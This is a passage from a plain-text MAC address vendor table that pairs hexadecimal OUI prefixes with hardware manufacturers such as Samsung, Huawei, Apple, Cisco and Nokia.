CO.,LTD. 586163 Quantum Networks (SG) Pte. Ltd. EC3DFD SHENZHEN BILIAN ELECTRONIC CO.,LTD 94D029 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 308454 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 5C0339 HUAWEI TECHNOLOGIES CO.,LTD F82819 Liteon Technology Corporation 0015E5 Cheertek Inc. 50E971 Jibo, Inc. 30F77F S Mobile Devices Limited D86C63 Google, Inc. 0840F3 Tenda Technology Co.,Ltd.Dongguan branch 94FBB2 SHENZHEN GONGJIN ELECTRONICS CO.,LT 001E99 Vantanol Industrial Corporation 58B633 Ruckus Wireless 5C5181 Samsung Electronics Co.,Ltd 608E08 Samsung Electronics Co.,Ltd 543D37 Ruckus Wireless 2CE6CC Ruckus Wireless 00227F Ruckus Wireless 74911A Ruckus Wireless 00C05D L&N TECHNOLOGIES 58C583 ITEL MOBILE LIMITED 18204C Kummler+Matter AG 18D225 Fiberhome Telecommunication Technologies Co.,LTD 18B430 Nest Labs Inc. 30B164 Power Electronics International Inc. F88A3C IEEE Registration Authority A40450 nFore Technology Inc. FC5A1D Hitron Technologies. Inc 94147A vivo Mobile Communication Co., Ltd. 3817E1 Technicolor CH USA Inc. 9828A6 COMPAL INFORMATION (KUNSHAN) CO., LTD. 943FC2 Hewlett Packard Enterprise 681DEF Shenzhen CYX Technology Co., Ltd. B40016INGENICO TERMINALS SAS AC203E Wuhan Tianyu Information Industry Co., Ltd. B01F29 Helvetia INC. 880F10 Huami Information Technology Co.,Ltd. 14612F Avaya Inc 00309D Nimble Microsystems, Inc. 8C210A TP-LINK TECHNOLOGIES CO.,LTD. 4C189A GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD CC4B73 AMPAK Technology, Inc. 0015DC KT&C Co., Ltd. 00187D Armorlink Co .Ltd F430B9 Hewlett Packard 0019F0 UNIONMAN TECHNOLOGY CO.,LTD C8DB26 Logitech A40E2B Facebook Inc AC4E2E Shenzhen JingHanDa Electronics Co.Ltd 4C910CLanix Internacional, S.A. de C.V. A47886 Avaya Inc 0403D6 Nintendo Co.,Ltd 5C1A6F Cambridge Industries(Group) Co.,Ltd. 3C4CD0 CERAGON NETWORKS F40E83 ARRIS Group, Inc. 98F7D7 ARRIS Group, Inc. B4BFF6 Samsung Electronics Co.,Ltd 2C3AE8 Espressif Inc. 88BD78 Flaircomm Microelectronics,Inc. 58C5CB Samsung Electronics Co.,Ltd 206BE7 TP-LINK TECHNOLOGIES CO.,LTD. 182CB4 Nectarsoft Co., Ltd. 54C9DF FN-LINK TECHNOLOGY LIMITED 74F61C HTC Corporation B8FFB3 MitraStar Technology Corp. EC237B zte corporation A0C9A0 Murata Manufacturing Co., Ltd. 982DBA Fibergate Inc. 84C0EF Samsung Electronics Co.,Ltd 00A38E Cisco Systems, Inc E0D55E GIGA-BYTE TECHNOLOGY CO.,LTD. A040A0 NETGEAR 000D2B Racal Instruments 004066 APRESIA Systems Ltd 48A74E zte corporation BC8AE8 QING DAO HAIER TELECOM CO.,LTD. F4DE0C ESPOD Ltd. 3C5282 Hewlett Packard 08ED02 IEEE Registration Authority E8FDE8 CeLa Link Corporation 28C63F Intel Corporate 88CC45 Skyworth Digital Technology(Shenzhen) Co.,Ltd 600837 ivvi Scientific(Nanchang)Co.Ltd EC363F Markov Corporation 5804CB Tianjin Huisun Technology Co.,Ltd. 60D7E3 IEEE Registration Authority 1893D7 Texas Instruments A8B86E LG Electronics (Mobile Communications) CC90E8 Shenzhen YOUHUA Technology Co., Ltd 7C4F7D Sawwave 9CAC6D Universal Electronics, Inc. 08EA40 SHENZHEN BILIAN ELECTRONIC CO.,LTD 00D095 Alcatel-Lucent Enterprise 0020DA Alcatel-Lucent Enterprise 6C5976 Shanghai Tricheer Technology Co.,Ltd. 7C7B8B Control Concepts, Inc. 84A9C4 HUAWEI TECHNOLOGIES CO.,LTD A0086F HUAWEI TECHNOLOGIES CO.,LTD 34CE00 XIAOMI Electronics,CO.,LTD D06F82 HUAWEI TECHNOLOGIES CO.,LTD A0F479 HUAWEI TECHNOLOGIES CO.,LTD 844765 HUAWEI TECHNOLOGIES CO.,LTD C4FF1F HUAWEI TECHNOLOGIES CO.,LTD A0C4A5 SYGN HOUSE CO.,LTD B83765 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 345BBB GD Midea Air-Conditioning Equipment Co.,Ltd. C40BCB Xiaomi Communications Co Ltd 84AFEC BUFFALO.INC 5CC6E9 Edifier International 98DDEA Infinix mobility limited 001D44 Krohne A8A198 TCT mobile ltd E0C0D1 CK Telecom (Shenzhen) Limited 00219E Sony Mobile Communications Inc ACB57D Liteon Technology Corporation D4619D Apple, Inc. D0498B ZOOM SERVER 0827CE NAGANO KEIKI CO., LTD. C0D3C0 Samsung Electronics Co.,Ltd 948BC1 Samsung Electronics Co.,Ltd 14568E Samsung Electronics Co.,Ltd 14BD61 Apple, Inc. 54E061 SICHUAN TIANYI COMHEART TELECOMCO., LTD 503A7D AlphaTech PLC Int’l Co., Ltd. F4C4D6 Shenzhen Xinfa Electronic Co.,ltd 6837E9 Amazon Technologies Inc. 2CA17D ARRIS Group, Inc. D83214 Tenda Technology Co.,Ltd.Dongguan branch 10954B Megabyte Ltd. D8325A Shenzhen YOUHUA Technology Co., Ltd 9CDA3E Intel Corporate 283F69 Sony Mobile Communications Inc 002CC8 Cisco Systems, Inc C0028D WINSTAR Display CO.,Ltd E89FEC CHENGDU KT ELECTRONIC HI-TECH CO.,LTD 802689 D-Link International F8AB05 Sagemcom Broadband SAS 7C5049 Apple, Inc. E47DEB Shanghai Notion Information Technology CO.,LTD. C4B9CD Cisco Systems, Inc D461FE Hangzhou H3C Technologies Co., Limited 2C4D54 ASUSTek COMPUTER INC. 349672 TP-LINK TECHNOLOGIES CO.,LTD. 64B473 Xiaomi Communications Co Ltd 7451BA Xiaomi Communications Co Ltd 6CB4A7 Landauer, Inc. 7802F8 Xiaomi Communications Co Ltd 00238A Ciena Corporation 001081 DPS, INC. 40F385 IEEE Registration Authority 887873 Intel Corporate F87588 HUAWEI TECHNOLOGIES CO.,LTD F44C7F HUAWEI TECHNOLOGIES CO.,LTD 28A24B Juniper Networks 080027 PCS Systemtechnik GmbH F8A5C5 Cisco Systems, Inc 7C5A1C Sophos Ltd B0F1EC AMPAK Technology, Inc. 542B57 Night Owl SP 501E2D StreamUnlimited Engineering GmbH E45D51 SFR EC01EE GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 6049C1 Avaya Inc 702084 Hon Hai Precision Ind. Co., Ltd. 9C6650 Glodio Technolies Co.,Ltd Tianjin Branch A0A33B HUAWEI TECHNOLOGIES CO.,LTD 7C67A2 Intel Corporate 00E05A GALEA NETWORK SECURITY 48A380 Gionee Communication Equipment Co.,Ltd. 94652D OnePlus Technology (Shenzhen) Co., Ltd 1CB857 Becon Technologies Co,.Ltd. 682737 Samsung Electronics Co.,Ltd F06E32 MICROTEL INNOVATION S.R.L. 54C415 Hangzhou Hikvision Digital Technology Co.,Ltd. 3CF862 Intel Corporate 2816AD Intel Corporate 0060D3 AT&T 848DC7 Cisco SPVTG 001992 Adtran Inc 045D4B Sony Corporation 78AF58 GIMASI SA 90505A unGlue, Inc 8C9351 Jigowatts Inc. D838FC Ruckus Wireless 3478D7 Gionee Communication Equipment Co.,Ltd. 5CCCA0 Gridwiz Inc. 6831FE Teladin Co.,Ltd. 5800E3 Liteon Technology Corporation 2C0BE9 Cisco Systems, Inc C43018 MCS Logic Inc. D0FF98 HUAWEI TECHNOLOGIES CO.,LTD B0E5ED HUAWEI TECHNOLOGIES CO.,LTD C486E9 HUAWEI TECHNOLOGIES CO.,LTD 000AE4 Wistron Corporation 344B3D Fiberhome Telecommunication Technologies Co.,LTD FC3CE9 Tsingtong Technologies Co, Ltd. A408F5 Sagemcom Broadband SAS 00B091 Transmeta Corp. ACC662 MitraStar Technology Corp. 886B44 Sunnovo International Limited A4580F IEEE Registration Authority C8F733 Intel Corporate E0A700 Verkada Inc 58404E Apple, Inc. D0C5F3 Apple, Inc. BC9FEF Apple, Inc. 20AB37 Apple, Inc. 60F445 Apple, Inc. 48F97C Fiberhome Telecommunication Technologies Co.,LTD 40B93C Hewlett Packard Enterprise C0BFC0 HUAWEI TECHNOLOGIES CO.,LTD 9CD9CB Lesira Manufacturing Pty Ltd 94E979 Liteon Technology Corporation A03D6F Cisco Systems, Inc A0E0AF Cisco Systems, Inc 187532 SICHUAN TIANYI COMHEART TELECOMCO., LTD 4CB81C SAM Electronics GmbH 003048 Super Micro Computer, Inc. 44D244 Seiko Epson Corporation A08CF8 HUAWEI TECHNOLOGIES CO.,LTD 7CF95C U.I. Lapp GmbH 101331 Technicolor A4E6B1 Shanghai Joindata Technology Co.,Ltd. C09C04 Shaanxi GuoLian Digital TV Technology Co.,Ltd. ACD657 Shaanxi GuoLian Digital TV Technology Co.,Ltd. 007686 Cisco Systems, Inc 8C2FA6 Solid Optics B.V. 8C192D IEEE Registration Authority 00ACE0 ARRIS Group, Inc. 007532 INID BV 6473E2 Arbiter Systems, Inc. 88C626 Logitech, Inc D0608C zte corporation AC233F Shenzhen Minew Technologies Co., Ltd. 7C03C9 Shenzhen YOUHUA Technology Co., Ltd B8E937 Sonos, Inc. E45D52 Avaya Inc 0023F7 Private 3C80AA Ransnet Singapore Pte Ltd B49691 Intel Corporate C82158 Intel Corporate 2420C7 Sagemcom Broadband SAS D4C8B0 Prime Electronics & Satellitics Inc. 446AB7 ARRIS Group, Inc. 701CE7 Intel Corporate 9C2A70 Hon Hai Precision Ind. Co.,Ltd. 703D15 Hangzhou H3C Technologies Co., Limited E49E12 FREEBOX SAS 0481AE Clack Corporation 9C13AB Chanson Water Co., Ltd. 98E476 Zentan 14A51A HUAWEI TECHNOLOGIES CO.,LTD 047503 HUAWEI TECHNOLOGIES CO.,LTD 3CEF8C Zhejiang Dahua Technology Co., Ltd. FC372B SICHUAN TIANYI COMHEART TELECOMCO.,LTD A4D9A4 neXus ID Solutions AB 484D7E Dell Inc. D4E90B CVT CO.,LTD CCB0DA Liteon Technology Corporation 7CCC1F SICHUAN TIANYI COMHEART TELECOMCO.,LTD 18F292 Shannon Systems 8CEA1B Edgecore Networks Corporation E02CF3 MRS Electronic GmbH 50B363 Digitron da Amazonia S/A 2C0E3D SAMSUNG ELECTRO-MECHANICS(THAILAND) 58E16C Ying Hua Information Technology (Shanghai)Co., LTD 9C7DA3 HUAWEI TECHNOLOGIES CO.,LTD A4C64F HUAWEI TECHNOLOGIES CO.,LTD CCFD17 TCT mobile ltd DC9FDB Ubiquiti Networks Inc. 002722 Ubiquiti Networks Inc. 00156D Ubiquiti Networks Inc. 00D78F Cisco Systems, Inc 2CBABA Samsung Electronics Co.,Ltd 40D3AE Samsung Electronics Co.,Ltd 2CDD95 Taicang T&W Electronics 88E87F Apple, Inc. 9CF48E Apple, Inc. 5CF7E6 Apple, Inc. B853AC Apple, Inc. 203CAE Apple, Inc. A03BE3 Apple, Inc. 4C3275 Apple, Inc. 487A55 ALE International 001EAE Continental Automotive Systems Inc. 502B73 Tenda Technology Co.,Ltd.Dongguan branch 04BA36 Li Seng Technology Ltd 107223 TELLESCOM INDUSTRIA E COMERCIO EM TELECOMUNICACAO E0686D Raybased AB 1861C7 lemonbeat GmbH 9CDC71 Hewlett Packard Enterprise B4F81E Kinova D03DC3 AQ Corporation EC01E2 FOXCONN INTERCONNECT TECHNOLOGY B4E782 Vivalnk 4409B8 Salcomp (Shenzhen) CO., LTD. 3816D1 Samsung Electronics Co.,Ltd D0176A Samsung Electronics Co.,Ltd D48890 Samsung Electronics Co.,Ltd 5492BE Samsung Electronics Co.,Ltd 205D47 vivo Mobile Communication Co., Ltd. 10C60C Domino UK Ltd 043110 Inspur Group Co., Ltd. 949AA9 Microsoft Corporation ACAB2E Beijing LasNubes Technology Co., Ltd. 600B03 Hangzhou H3C Technologies Co., Limited A0AB1B D-Link International D842E2 Canary Connect, Inc. C8B21E CHIPSEA TECHNOLOGIES (SHENZHEN) CORP. 000678 D&M Holdings Inc. E0286D AVM Audiovisuelles Marketing und Computersysteme GmbH 884CCF Pulzze Systems, Inc 500959 Technicolor CH USA Inc. E41218 ShenZhen Rapoo Technology Co., Ltd. 001984 ESTIC Corporation 001628 Magicard Ltd 702E22 zte corporation C8E776 PTCOM Technology 000278 SAMSUNG ELECTRO MECHANICS CO., LTD. 002399 Samsung Electronics Co.,Ltd 0017C9 Samsung Electronics Co.,Ltd 906EBB Hon Hai Precision Ind. Co.,Ltd. 18F46A Hon Hai Precision Ind. Co.,Ltd. 4C0F6E Hon Hai Precision Ind. Co.,Ltd. 78E400 Hon Hai Precision Ind. Co.,Ltd. 00212F Phoebe Micro Inc. 3859F9 Hon Hai Precision Ind. Co.,Ltd. EC55F9 Hon Hai Precision Ind. Co.,Ltd. C4731E Samsung Electronics Co.,Ltd 5C0A5B SAMSUNG ELECTRO MECHANICS CO., LTD. 7CE9D3 Hon Hai Precision Ind. Co.,Ltd. 1C3E84 Hon Hai Precision Ind. Co.,Ltd. B8763F Hon Hai Precision Ind. Co.,Ltd. 60F494 Hon Hai Precision Ind. Co.,Ltd. 8056F2 Hon Hai Precision Ind. Co.,Ltd. 7CF854 Samsung Electronics Co.,Ltd 001B98 Samsung Electronics Co.,Ltd 001A8A Samsung Electronics Co.,Ltd 3C5A37 Samsung Electronics Co.,Ltd F49F54 Samsung Electronics Co.,Ltd 34C3AC Samsung Electronics Co.,Ltd 44F459 Samsung Electronics Co.,Ltd 00265D Samsung Electronics Co.,Ltd CCF9E8 Samsung Electronics Co.,Ltd D857EF Samsung Electronics Co.,Ltd 18E2C2 Samsung Electronics Co.,Ltd 9852B1 Samsung Electronics Co.,Ltd E440E2 Samsung Electronics Co.,Ltd 103B59 Samsung Electronics Co.,Ltd D890E8 Samsung Electronics Co.,Ltd C462EA Samsung Electronics Co.,Ltd 14F42A Samsung Electronics Co.,Ltd 0808C2 Samsung Electronics Co.,Ltd CCFE3C Samsung Electronics Co.,Ltd 28BAB5 Samsung Electronics Co.,Ltd 182666 Samsung Electronics Co.,Ltd 30D6C9 Samsung Electronics Co.,Ltd CC07AB Samsung Electronics Co.,Ltd 002567 Samsung Electronics Co.,Ltd BCB1F3 Samsung Electronics Co.,Ltd 1C62B8 Samsung Electronics Co.,Ltd B43A28 Samsung Electronics Co.,Ltd 78A873 Samsung Electronics Co.,Ltd 001C43 Samsung Electronics Co.,Ltd 0023D6 Samsung Electronics Co.,Ltd E4121D Samsung Electronics Co.,Ltd 44D6E1 Snuza International Pty. Ltd. FC9114 Technicolor CH USA Inc. 486DBB Vestel Elektronik San ve Tic. A.Åž. 002A10 Cisco Systems, Inc 00A289 Cisco Systems, Inc 44E9DD Sagemcom Broadband SAS 000F5E Veo 001328 Westech Korea Inc., B8BF83 Intel Corporate 8C6102 Beijing Baofengmojing Technologies Co., Ltd 548CA0 Liteon Technology Corporation 7C79E8 PayRange Inc. A43111 ZIV 008073 DWB ASSOCIATES 80A1D7 Shanghai DareGlobal Technologies Co.,Ltd EC1F72 SAMSUNG ELECTRO-MECHANICS(THAILAND) 8C0D76 HUAWEI TECHNOLOGIES CO.,LTD 84BE52 HUAWEI TECHNOLOGIES CO.,LTD 849FB5 HUAWEI TECHNOLOGIES CO.,LTD A4CAA0 HUAWEI TECHNOLOGIES CO.,LTD 84E0F4 IEEE Registration Authority D83062 Apple, Inc. D0E54D ARRIS Group, Inc. A0C562 ARRIS Group, Inc. 8496D8 ARRIS Group, Inc. 0026D9 ARRIS Group, Inc. E8508B SAMSUNG ELECTRO-MECHANICS(THAILAND) F8042E SAMSUNG ELECTRO-MECHANICS(THAILAND) 00D037 ARRIS Group, Inc. 84E058 ARRIS Group, Inc. 707630 ARRIS Group, Inc. 04BBF9 Pavilion Data Systems Inc E4BEED Netcore Technology Inc. 58FB84 Intel Corporate 00A00E NetAlly 00C017 NetAlly 5CB066 ARRIS Group, Inc. BC8AA3 NHN Entertainment A8BD27 Hewlett Packard Enterprise 345760 MitraStar Technology Corp. C0D391 IEEE Registration Authority D49B5C Chongqing Miedu Technology Co., Ltd. E8EB11 Texas Instruments 44BFE3 Shenzhen Longtech Electronics Co.,Ltd 3C6FEA Panasonic India Pvt. Ltd. 002261 Frontier Silicon Ltd 001988 Wi2Wi, Inc 18DC56 Yulong Computer Telecommunication Scientific (Shenzhen) Co.,Ltd 0016F2 Dmobile System Co., Ltd. 34074F AccelStor, Inc. B4A984 Symantec Corporation B0B28F Sagemcom Broadband SAS 441441 AudioControl Inc. C88D83 HUAWEI TECHNOLOGIES CO.,LTD 00E011 UNIDEN CORPORATION 002555 Visonic Technologies 1993 Ltd. 58986F Revolution Display C81FBE HUAWEI TECHNOLOGIES CO.,LTD 203DB2 HUAWEI TECHNOLOGIES CO.,LTD 48D539 HUAWEI TECHNOLOGIES CO.,LTD 001F9A Nortel Networks 000A0E Invivo Research Inc. 001660 Nortel Networks 001E7E Nortel Networks 001365 Nortel Networks 000438 Nortel Networks 000EC0 Nortel Networks D84FB8 LG ELECTRONICS 000AEB TP-LINK TECHNOLOGIES CO.,LTD. 2C3731 SHENZHEN YIFANG DIGITAL TECHNOLOGY CO.,LTD. 60EE5C SHENZHEN FAST TECHNOLOGIES CO.,LTD 6488FF Sichuan Changhong Electric Ltd. 002162 Nortel Networks 02E6D3 NIXDORF COMPUTER CORP. 0016B9 ProCurve Networking by HP C4084A Nokia 000801 HighSpeed Surfing Inc. 000772 Alcatel-Lucent Shanghai Bell Co., Ltd E03005 Alcatel-Lucent Shanghai Bell Co., Ltd 3C404F GUANGDONG PISEN ELECTRONICS CO.,LTD 0CA402 Alcatel-Lucent IPD A0F3E4 Alcatel-Lucent IPD 84DBFC Nokia 7CFC3C Visteon Corporation 981E0F Jeelan (Shanghai Jeelan Technology Information Inc 4888CA Motorola (Wuhan) Mobility Technologies Communication Co., Ltd. 385610 CANDY HOUSE, Inc. 00A742 Cisco Systems, Inc 00AA70 LG Electronics (Mobile Communications) F895C7 LG Electronics (Mobile Communications) 84D931 Hangzhou H3C Technologies Co., Limited 00116E Peplink International Ltd. 540955 zte corporation 001E75 LG Electronics (Mobile Communications) 001C62 LG Electronics (Mobile Communications) 505527 LG Electronics (Mobile Communications) 88C9D0 LG Electronics (Mobile Communications) C041F6 LG ELECTRONICS INC 8C3AE3 LG Electronics (Mobile Communications) 90A46A SISNET CO., LTD 14E7C8 Integrated Device Technology (Malaysia) Sdn. Bhd. ECCD6D Allied Telesis, Inc. 18339D Cisco Systems, Inc 146102 Alpine Electronics, Inc. 54276C Jiangsu Houge Technology Corp. 9CA3A9 Guangzhou Juan Optical and Electronical Tech Joint Stock Co., Ltd 7CC709 SHENZHEN RF-LINK TECHNOLOGY CO.,LTD. A03E6B IEEE Registration Authority 9802D8 IEEE Registration Authority 64FB81 IEEE Registration Authority 0821EF Samsung Electronics Co.,Ltd 34145F Samsung Electronics Co.,Ltd 2C265F IEEE Registration Authority D0052A Arcadyan Corporation E4509A HW Communications Ltd 702900 Shenzhen ChipTrip Technology Co,Ltd ECAAA0 PEGATRON CORPORATION 00E0DD Zenith Electronics Corporation 50CE75 Measy Electronics Co., Ltd. 00045B Techsan Electronics Co., Ltd. 0007BA UTStarcom Inc 90A210 United Telecoms Ltd 6C0B84 Universal Global Scientific Industrial Co., Ltd. 001597 AETA AUDIO SYSTEMS 002397 Westell Technologies Inc. 60E3AC LG Electronics (Mobile Communications) 90F052 MEIZU Technology Co., Ltd. 001639 Ubiquam Co., Ltd. 000C29 VMware, Inc. 000569 VMware, Inc. 000B0E Trapeze Networks 8CFDF0 Qualcomm Inc. C4BB4C Zebra Information Tech Co. Ltd 98CF53 BBK EDUCATIONAL ELECTRONICS CORP.,LTD. D4A148 HUAWEI TECHNOLOGIES CO.,LTD D065CA HUAWEI TECHNOLOGIES CO.,LTD 486B2C BBK EDUCATIONAL ELECTRONICS CORP.,LTD. 6C25B9 BBK EDUCATIONAL ELECTRONICS CORP.,LTD. 2C282D BBK EDUCATIONAL ELECTRONICS CORP.,LTD. 4813F3 BBK EDUCATIONAL ELECTRONICS CORP.,LTD. 00409F Telco Systems, Inc. 00001F Telco Systems, Inc. 00A012 Telco Systems, Inc. 8CEBC6 HUAWEI TECHNOLOGIES CO.,LTD B08900 HUAWEI TECHNOLOGIES CO.,LTD 78CB68 DAEHAP HYPER-TECH 34ED0BShanghai XZ-COM.CO.,Ltd. F0DEF1 Wistron Infocomm (Zhongshan) Corporation F80F41 Wistron Infocomm (Zhongshan) Corporation 3C970E Wistron InfoComm(Kunshan)Co.,Ltd. 30144A Wistron Neweb Corporation 4C0BBE Microsoft 0C2576 LONGCHEER TELECOMMUNICATION LIMITED D8D43C Sony Corporation D44165 SICHUAN TIANYI COMHEART TELECOMCO.,LTD E4029B Intel Corporate DC1AC5 vivo Mobile Communication Co., Ltd. F45EAB Texas Instruments A8FCB7 Consolidated Resource Imaging 00C000 LANOPTICS, LTD. 845181 Samsung Electronics Co.,Ltd B0C287 Technicolor CH USA Inc. CC3540 Technicolor CH USA Inc. 8C04FF Technicolor CH USA Inc. FC94E3 Technicolor CH USA Inc. B88D12 Apple, Inc. 90EF68 Zyxel Communications Corporation C816BD Qingdao Hisense Communications Co.,Ltd. 00EBD5 Cisco Systems, Inc C48F07 Shenzhen Yihao Hulian Science and Technology Co., Ltd. DC7834 LOGICOM SA CCCC81 HUAWEI TECHNOLOGIES CO.,LTD 6C9522 Scalys B456B9 Teraspek Technologies Co.,Ltd 9CDD1F Intelligent Steward Co.,Ltd 3C6816 VXi Corporation E811CA SHANDONG KAER ELECTRIC.CO.,LTD 70288B Samsung Electronics Co.,Ltd 348A7B Samsung Electronics Co.,Ltd D0577B Intel Corporate 78009E Samsung Electronics Co.,Ltd ACC33A Samsung Electronics Co.,Ltd 54F201 Samsung Electronics Co.,Ltd C4A366 zte corporation 6073BC zte corporation 7C3548 Transcend Information 18B169 Sonicwall 444450 OttoQ 50F5DA Amazon Technologies Inc. 101212 Vivo International Corporation Pty Ltd C85B76 LCFC(HeFei) Electronics Technology co., ltd 78FFCA TECNO MOBILE LIMITED 046565 Testop A8BB50 WiZ IoT Company Limited 08C021 HUAWEI TECHNOLOGIES CO.,LTD 600810 HUAWEI TECHNOLOGIES CO.,LTD 48435A HUAWEI TECHNOLOGIES CO.,LTD 8C8EF2 Apple, Inc. 90B0ED Apple, Inc. F03EBF GOGORO TAIWAN LIMITED 3C92DC Octopod Technology Co. Ltd. 1000FD LaonPeople C47C8D IEEE Registration Authority 745C9F TCT mobile ltd 8C99E6 TCT mobile ltd 449F7F DataCore Software Corporation 848319 Hangzhou Zero Zero Technology Co., Ltd. A81559 Breathometer, Inc. 70BAEF Hangzhou H3C Technologies Co., Limited 586AB1 Hangzhou H3C Technologies Co., Limited 009006 Hamamatsu Photonics K.K. 001AF4 Handreamnet 04D3CF Apple, Inc. 4882F2 Appel Elektronik GmbH 78B84B SICHUAN TIANYI COMHEART TELECOMCO.,LTD 7CB0C2 Intel Corporate 001793 Tigi Corporation 000358 Hanyang Digitech Co.Ltd C4CAD9 Hangzhou H3C Technologies Co., Limited 5866BA Hangzhou H3C Technologies Co., Limited E0C79D Texas Instruments 4C0B3A TCT mobile ltd E42D02 TCT mobile ltd 0CBD51 TCT mobile ltd 4000E0 Derek(Shaoguan)Limited FCBC9C Vimar Spa 149ECF Dell Inc. E80959 Guoguang Electric Co.,Ltd D89403 Hewlett Packard Enterprise E00EDA Cisco Systems, Inc D0A4B1 Sonifex Ltd. F49EEF Taicang T&W Electronics C4F081 HUAWEI TECHNOLOGIES CO.,LTD 801382 HUAWEI TECHNOLOGIES CO.,LTD 94FE22 HUAWEI TECHNOLOGIES CO.,LTD F4CC55 Juniper Networks 50DD4F Automation Components, Inc 341FE4 ARRIS Group, Inc. 0024F4 Kaminario, Ltd. 001A29 Johnson Outdoors Marine Electronics d/b/a Minnkota 0090AE ITALTEL S.p.A/RF-UP-I 00177D IDT Technology Limited 00A045 PHOENIX CONTACT Electronics GmbH 002378 GN Netcom A/S 50C971 GN Netcom A/S F0407B Fiberhome Telecommunication Technologies Co.,LTD 94885E Surfilter Network Technology Co., Ltd. C825E1 Lemobile Information Technology (Beijing) Co., Ltd 945089 SimonsVoss Technologies GmbH 042AE2 Cisco Systems, Inc E0B6F5 IEEE Registration Authority 0090FA Emulex Corporation 00E0D5 Emulex Corporation 001035 Elitegroup Computer Systems Co.,Ltd. 000AE6 Elitegroup Computer Systems Co.,Ltd. 7427EA Elitegroup Computer Systems Co.,Ltd. 649968 Elentec 00409C TRANSWARE B01BD2 Le Shi Zhi Xin Electronic Technology (Tianjin) Limited 54489C CDOUBLES ELECTRONICS CO. LTD. E4A1E6 Alcatel-Lucent Shanghai Bell Co., Ltd 84002D PEGATRON CORPORATION 408256 Continental Automotive GmbH 5CC7D7 AZROAD TECHNOLOGY COMPANY LIMITED 986B3D ARRIS Group, Inc. E0071B Hewlett Packard Enterprise 1CABC0 Hitron Technologies. Inc 1C3ADE Samsung Electronics Co.,Ltd 002360 Lookit Technology Co., Ltd 84FEDC Borqs Beijing Ltd. 608334 HUAWEI TECHNOLOGIES CO.,LTD E47E66 HUAWEI TECHNOLOGIES CO.,LTD 94DBDA HUAWEI TECHNOLOGIES CO.,LTD 54D9E4 BRILLIANTTS CO., LTD F462D0 Not for Radio, LLC 98DED0 TP-LINK TECHNOLOGIES CO.,LTD. 508965 SHENZHEN MERCURY COMMUNICATION TECHNOLOGIES CO.,LTD. 005BA1 shanghai huayuan chuangxin software CO., LTD. 58D67A TCPlink 98072D Texas Instruments F0C77F Texas Instruments 000AC2 Wuhan FiberHome Digital Technology Co.,Ltd. 10DA43 NETGEAR B805AB zte corporation 789682 zte corporation D467E7 Fiberhome Telecommunication Technologies Co.,LTD E42F26 Fiberhome Telecommunication Technologies Co.,LTD 04C1B9 Fiberhome Telecommunication Technologies Co.,LTD C4BED4 Avaya Inc D017C2 ASUSTek COMPUTER INC. 349971 Quanta Storage Inc. 9C52F8 HUAWEI TECHNOLOGIES CO.,LTD EC13DB Juniper Networks 5CF286 IEEE Registration Authority E8FD72 SHANGHAI LINGUO TECHNOLOGY CO., LTD. 98BB1E BYD Precision Manufacture Company Ltd. AC5F3E SAMSUNG ELECTRO-MECHANICS(THAILAND) 546D52 TOPVIEW OPTRONICS CORP. 04C103 Clover Network, Inc. 280C28 Unigen DataStorage Corporation A4BF01 Intel Corporate 208B37 Skyworth Digital Technology(Shenzhen) Co.,Ltd 08BE77 Green Electronics 509EA7 Samsung Electronics Co.,Ltd A88195 Samsung Electronics Co.,Ltd 88ADD2 Samsung Electronics Co.,Ltd 00CCFC Cisco Systems, Inc 0019C5 Sony Interactive Entertainment Inc. 001315 Sony Interactive Entertainment Inc. 1C234F EDMIEurope Ltd A444D1Wingtech Group (HongKong)Limited 006CFD Sichuan Changhong Electric Ltd. 545AA6 Espressif Inc. FC1A11 vivo Mobile Communication Co., Ltd. 001A57 Matrix Design Group, LLC A0C589 Intel Corporate 001E1E Honeywell Life Safety 002340 MiXTelematics B48B19 Apple, Inc. 38FDFE IEEE Registration Authority 2C09CB COBS AB BCEC5D Apple, Inc. 28A02B Apple, Inc. A84481 Nokia Corporation 8844F6 Nokia Corporation F44D17 GOLDCARD HIGH-TECH CO.,LTD. 38B8EB IEEE Registration Authority 9897D1 MitraStar Technology Corp. B83241 Wuhan Tianyu Information Industry Co., Ltd. 0060DC NEC Magnus Communications,Ltd. 907282 Sagemcom Broadband SAS 001C35 Nokia Danmark A/S 001C9A Nokia Danmark A/S 001CD6 Nokia Danmark A/S 001CD4 Nokia Danmark A/S 001D98 Nokia Danmark A/S 001DE9 Nokia Danmark A/S 001E3A Nokia Danmark A/S 002548 Nokia Danmark A/S 0022FC Nokia Danmark A/S 0022FD Nokia Danmark A/S 0021AA Nokia Danmark A/S 001D6E Nokia Danmark A/S 0023B4 Nokia Danmark A/S 001370 Nokia Danmark A/S 9C1874 Nokia Danmark A/S 001BAF Nokia Danmark A/S C8D10B Nokia Corporation 5CC6D0 Skyworth Digital Technology(Shenzhen) Co.,Ltd 001A9A Skyworth Digital Technology(Shenzhen) Co.,Ltd CC6DA0 Roku, Inc. 0016E4 VANGUARD SECURITY ENGINEERING CORP. 3C8970 Neosfar 001742 FUJITSU LIMITED 001999 Fujitsu Technology Solutions GmbH 005A39 SHENZHEN FAST TECHNOLOGIES CO.,LTD A089E4 Skyworth Digital Technology(Shenzhen) Co.,Ltd 78CA83 IEEE Registration Authority 0C1167 Cisco Systems, Inc 74EAE8 ARRIS Group, Inc. F88E85 Comtrend Corporation 02CF1C Communication Machinery Corporation 0090F5 CLEVO CO. 0030FF DataFab Systems Inc. 000FF6 DARFON LIGHTING CORP 002100 Gemtek Technology Co., Ltd. 50F520 Samsung Electronics Co.,Ltd 64B310 Samsung Electronics Co.,Ltd A4EBD3 Samsung Electronics Co.,Ltd C81073 CENTURY OPTICOMM CO.,LTD 343759 zte corporation FC2F40 Calxeda, Inc. BC620E HUAWEI TECHNOLOGIES CO.,LTD 74A528 HUAWEI TECHNOLOGIES CO.,LTD 5CF6DC Samsung Electronics Co.,Ltd 0026E4 Canal + 000117 Canal + E01D3B Cambridge Industries(Group) Co.,Ltd. 70C76F INNO S 38192F Nokia Corporation B8C68E Samsung Electronics Co.,Ltd 04FE31 Samsung Electronics Co.,Ltd 4CBCA5 Samsung Electronics Co.,Ltd D831CF Samsung Electronics Co.,Ltd 188331 Samsung Electronics Co.,Ltd 9C65B0 Samsung Electronics Co.,Ltd 8455A5 Samsung Electronics Co.,Ltd 